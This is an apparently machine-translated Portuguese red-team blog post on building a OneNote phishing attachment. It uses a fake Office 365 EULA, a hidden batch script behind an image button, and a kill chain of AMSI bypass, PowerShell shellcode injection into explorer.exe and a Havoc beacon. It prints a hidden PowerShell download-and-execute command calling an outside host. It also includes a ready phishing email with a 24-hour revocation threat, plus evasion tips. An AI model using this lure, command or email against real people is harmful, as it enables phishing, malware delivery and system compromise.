Os anexos de malware do neNote aumentaram nas últimas semanas e estão sendo aclamados como a nova macro. Mas, assim como o método de entrega de macro, a entrega do OneNote requer interação do usuário.
Então, vamos ver se conseguimos que um usuário clique em nosso malware do OneNote!
O pretexto
Há um milhão de pretextos por aí para inspirar a interação do usuário. Você pode encontrá-los em todo o GitHub, mas aqui está um exemplo fácil. O pretexto é enviar um e-mail ao usuário informando que sua licença do Microsoft Office 365 está desatualizada.
A chamada à ação é abrir um Contrato de Licenciamento de Usuário Final e aceitar os termos e condições. Você também pode emparelhar seu documento EULA OneNote com o binário de configuração do Office. Este é um binário assinado da Microsoft e adiciona um pouco mais de legitimidade ao seu pretexto, mas é complementar.
Como o O365 já está instalado no sistema, a execução do binário será irrelevante para o host.
Então, vamos começar configurando nosso documento do OneNote. Simplesmente abro o OneNote e crio um novo bloco de anotações.
A data e a hora da criação estarão no topo. Você pode simplesmente escrever o Contrato de licença do usuário final na parte superior.
Vamos adicionar alguns ganhos do O365 ao topo para torná-lo um pouco mais convincente. Uma simples pesquisa de imagens no Google nos dá muito com o que trabalhar. Aqui está uma amostra de uma imagem de cabeçalho.
Em seguida, podemos fazer uma pesquisa simples no Google por um EULA do O365. Aqui está um site com muitos documentos de licenciamento.
https://www.microsoft.com/licensing/docs
E aqui está um contrato de licenciamento para Word, Excel, etc.
https://support.office.com/legal?llcc=en..._EN-US.htm
Podemos simplesmente copiá-lo e colá-lo em nosso documento do OneNote.
Agora precisamos criar uma maneira de o usuário clicar em um script para iniciar nossa cadeia de eliminação. Minha postagem anterior no blog https://assume-breach.medium.com/home-g … b1ecae291f mostrará como configurar sua cadeia de interrupção do Powershell.
Para esta configuração, vamos usar esta cadeia de morte.
Botão de imagem do OneNote oculta script em lote que chama > arquivo read.md (desvio AMSI) chama para > readme.txt (executor de shellcode do Powershell com injeção de processo para explorer.exe)
Script em lote
Há duas coisas que queremos que o script em lote faça. A primeira é gerar uma caixa de mensagem informando ao usuário que ele aceitou o EULA com sucesso. Esperançosamente, isso também irá distraí-los do prompt de comando que será aberto.
A segunda coisa é que precisamos do script em lote para iniciar nossa cadeia de interrupção do Powershell.
Então, aqui está um script de lote simples que você pode usar. Obviamente, existem maneiras melhores de fazer isso, mas este é um POC bastante simples de se construir.
off
echo Registrando a licença do Office 365. Aguarde
timeout /t 5
msg * Obrigado por aceitar os termos e condições da Microsoft
start powershell -WindowStyle Hidden -Command iex(new-object system.net.webclient).downloadstring(' http://IP:PORT/ leia.md' )"
Então, o que isso está fazendo? É muito fácil de ver apenas olhando para ele. O primeiro comando ecoa Registrando a licença do Office 365. Por favor, aguarde." De qualquer forma, o script em lote iniciará um prompt do CMD, portanto, usaremos essa vantagem com alguma engenharia social.
O script faz uma contagem regressiva de 5 segundos e, em seguida, abre uma caixa de mensagem que diz Obrigado por aceitar os termos e condições da Microsoft.
Parece legítimo, certo?.
Vamos salvar nosso script em lote no Notepad++ e adicioná-lo ao OneNote.
Nós apenas temos que arrastá-lo para o arquivo e vemos um prompt. Selecionamos Anexar arquivo e ele é adicionado.
Ok, então nosso script foi adicionado ao OneNote. Então, como fazemos com que o usuário o execute?
Construindo o botão do OneNote
Encontrei este site que nos permite criar um botão PNG com texto personalizado e cores de fundo.
https://www.clickminded.com/button-generator/
Então adicionei algum texto e mudei o fundo para combinar com o laranja 0365.
Baixei meu botão e o adicionei ao OneNote.
Como você pode ver, temos o botão e o script. Vamos combiná-los. Eu simplesmente arrasto o script atrás do botão.
Em todos os POCs que vi nas mídias sociais, os autores de malware anexaram várias versões do script e colocaram tudo na parte de trás do botão. O que seria mais ou menos assim.
Isso garante que, quando o usuário clicar no botão, ele clicará em pelo menos um dos scripts para execução.
Estamos em boa forma, então vamos esconder nossos scripts. Clicamos com o botão direito do mouse no botão, escolhemos Order e depois Bring Forward
Teremos que fazer isso várias vezes já que temos mais de um script, então reajustamos o botão para cobrir o texto do nome do arquivo. E ficamos com isso.
Ótimo! Agora podemos exportar a seção do OneNote para nossa área de trabalho e estamos prontos para criar o produto ZIP.
O Entregável
Eu tenho o arquivo OneNote e o binário OfficeSetup. Vou alterar OfficeSetup.exe para OfficeUpdater.exe.
Agora posso compactar esses dois juntos.
Vou transferir OfficeUpdate.zip para minha máquina Linux e hospedá-lo.
Execução
Se este fosse um exercício de equipe vermelha real, eu teria um domínio com hospedagem de arquivos, certificados SSL e tudo mais. Mas como isso é apenas um teste, vamos hospedá-lo em http.
No alvo, vamos fingir que somos David e acabamos de receber o seguinte e-mail
Bom dia David,
Nosso departamento de TI determinou que sua licença do Microsoft Office 365 precisa ser renovada. Vá para o endereço a seguir e baixe o pacote de atualização do Office.
http://IP:port/OfficeUpdater.zip
Depois de descompactar o pacote, abra o Contrato de Licenciamento do Usuário Final (EULA) e aceite os termos e condições da Microsoft. Em seguida, abra o programa OfficeUpdater.exe para atualizar sua licença do Office 365.
Não há necessidade de enviar um e-mail de acompanhamento, pois veremos a renovação após a conclusão. Você tem 24 horas para atualizar sua licença ou seu acesso aos aplicativos do Office 365 será revogado. Conclua esta tarefa o mais rápido possível.
Obrigado!
-Equipe de TI da empresa
David clica no link e nosso produto é baixado sem incidentes.
David abre o arquivo zip.
E ele abre o documento EULA e rola até o final para aceitar os Termos e Condições.
Assim que ele clica no botão, nossa carga é disparada. Na captura de tela, vemos que o prompt de comando é aberto. Em seguida, alguns segundos depois, um breve flash de uma tela do Powershell e, em seguida, nossa caixa de mensagem.
Neste ponto, a cadeia de morte é iniciada. Nosso servidor python mostra que read.md (nosso bypass AMSI) é executado.
Em seguida, readme.txt (nosso executor de shellcode do Powershell) é executado.
E, finalmente, temos alguma injeção de processo e um farol em Havoc.
https://external-content.
duckduckgo.com/iu/?u=https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afit%3A875%2F1%2AgNdgxr8udeAMe4YoDwxfmQ.png
Como você pode ver, esse pode ser um meio bastante eficaz de phishing. Esta VM está executando o Defender For Endpoint. Não bloqueou a execução, mas vamos ver se lançamos algum alerta.
Alguns médios e um alto. Vamos nos aprofundar no alerta de alta gravidade.
Possível acesso inicial via OneNote. Como você pode ver, a Microsoft está bem ciente desse truque. Não fizemos exatamente com muita discrição, mas como um POC do que pode ser realizado, demonstramos como isso pode ser simples.
Obviamente, o OneNote que inicia qualquer tipo de execução de comando será alertado pelo AV/EDR moderno. Pode ser possível implementar alguma falsificação de processo pai-filho para ignorar esses alertas.
Uma variação possível disso seria fazer com que o botão chegasse a um gancho BEEF. Outras formas de execução no lugar do script em lote também podem ser uma boa alternativa para manter as coisas mais furtivas.